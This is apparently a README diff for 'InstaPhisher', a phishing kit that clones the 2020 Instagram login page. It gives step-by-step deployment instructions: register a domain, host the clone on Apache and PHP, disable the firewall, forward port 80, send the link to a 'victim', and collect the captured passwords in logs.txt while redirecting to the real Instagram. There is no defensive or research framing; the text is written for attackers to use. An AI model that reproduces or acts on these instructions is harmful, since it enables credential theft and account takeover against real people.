lychhayly/InstaPhisher/README.md

 This site is a clone of the 2020 instagram login page.
 You need to have and configure a DNS (you can get a free one here: https://www.freenom.com/fr).
 You must also have a valid apache version (https://httpd.apache.org/download.cgi) and php (https://www.php.net/downloads).

 Then, move all InstaPhisher files to the apache folder ("/var/www/html" for linux).
 Make sure to disable your firewall and redirect the port 80 (UDP/TCP) on your router to your machine.
-If you use Linux, you must grant read and write permissions to the files InstaPhisher.py, login.php and logs.txt when it will be created.
+If you use Linux, you must grant read and write permissions to the files logs.txt and serverMsg.txt when it will be created.
 After, use python in a terminal and start the file InstaPhisher.py.
 Send your DNS url to your target and wait.
 Please do not modify the logs.txt file during this step.
 When your victim logs on, you'll be notified via terminal.
 The passwords will be saved in the logs.txt file.

 You can modify the redirect link in the login.php file.
 Enter url in header() function, after 'Location: ' at line 21.
 The default redirection is https://www.instagram.com.